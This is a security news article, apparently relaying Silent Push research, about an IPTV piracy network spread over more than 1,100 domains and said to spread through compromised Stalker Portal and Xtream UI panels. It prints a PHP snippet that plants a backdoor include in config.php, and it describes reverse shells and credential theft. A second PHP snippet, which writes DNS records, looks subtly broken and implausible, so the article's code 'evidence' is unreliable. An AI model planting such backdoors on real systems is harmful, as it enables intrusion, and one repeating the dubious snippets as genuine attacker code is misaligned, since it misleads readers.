A sprawling network of illicit Internet Protocol Television (IPTV) services has been discovered, operating across more than 1,100 domains and in excess of 10,000 IP addresses.
This sprawling infrastructure, which has remained active for several years, delivers unauthorized streams of premium content—including major sports leagues, subscription services, and on-demand platforms—without licensing agreements.
Silent Push analysts noted that this network’s use of both high-volume IP address pools and rapidly rotating domains represents a significant escalation in piracy tactics, making traditional takedown processes nearly futile.
At its core, the network relies on customized IPTV panels built around modified open-source software such as Stalker Portal and Xtream UI.
These panels facilitate automated user authentication and stream distribution, allowing operators to provision hundreds of thousands of simultaneous sessions.
Rather than depending on a single front-end domain, the operators employ a large pool of proxy domains—each resolving to multiple shared IP addresses—to obfuscate the true origin of the streams.
Silent Push researchers identified two companies, XuiOne and Tiyansoft, and an individual, Nabi Neamati of Herat, Afghanistan, as principal beneficiaries of this infrastructure.
.webp "Massive IPTV Hosted Across More Than 1,000 Domains and Over 10,000 IP Addresses 3")
The attack vectors begin with server-side exploitation and credential harvesting. Malicious actors compromise under-protected web hosts or exploit outdated control panels to install custom modules that inject backdoors into legitimate streaming control software.
In many cases, operators gain initial access by exploiting default credentials on cPanel, Plesk, and Stalker Portal installations.
Once access is secured, a deployment script—often obfuscated via Base64 encoding—pushes modified PHP files and cron jobs to automate the registration of new domains and the rotation of stream endpoints.
Silent Push analysts identified one such script that uses the following code snippet to register new virtual hosts:
$domain = trim(shell_exec('wp option get siteurl'));
$ipList = ['158.220.114.199','46.202.197.208'];
foreach ($ipList as $ip) {
shell_exec("echo '$domain IN A $ip' >> /etc/bind/db.piracy");
}
shell_exec('rndc reload');Despite repeated takedown requests, the network’s agility in rotating both domains and IP addresses allows it to remain operational.
New domains appear almost daily, with each resolving to clusters of dynamic IP addresses provisioned via bullet-proof hosting providers.
This resilient structure poses a formidable challenge to rights holders and law enforcement agencies attempting to disrupt the service.
Infection Mechanism Through Control Panel Exploits
A particularly insidious aspect of this IPTV piracy network is its infection mechanism, which centers on compromised control panels.
.webp "Massive IPTV Hosted Across More Than 1,000 Domains and Over 10,000 IP Addresses 4")
Operators survey the internet for misconfigured or outdated installations of Stalker Portal and Xtream UI, using automated scanners to detect vulnerable endpoints on ports 80, 8080, and 2095.
.webp "Massive IPTV Hosted Across More Than 1,000 Domains and Over 10,000 IP Addresses 5")
Upon identifying a target, they deploy a multi-stage payload that begins with a low-profile reconnaissance module.
This module enumerates existing user accounts, collects hashed credentials, and exfiltrates configuration files containing API keys.
A second stage installs a persistent backdoor by modifying the config.php file within the panel’s directory:-
if (!defined('IPTV_INIT')) {
define('IPTV_INIT', true);
require_once __DIR__ . '/backdoor.php';
}The backdoor script, backdoor.php, establishes a reverse shell to a command-and-control server whenever an administrator logs in, effectively granting the attackers full control over the panel.
This persistent foothold enables continuous updates to the hosting infrastructure, seamless domain registration, and dynamic IP assignment—ensuring that new entry points replace any that have been taken down.
As a result, the network can sustain large-scale piracy operations with minimal interruption.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
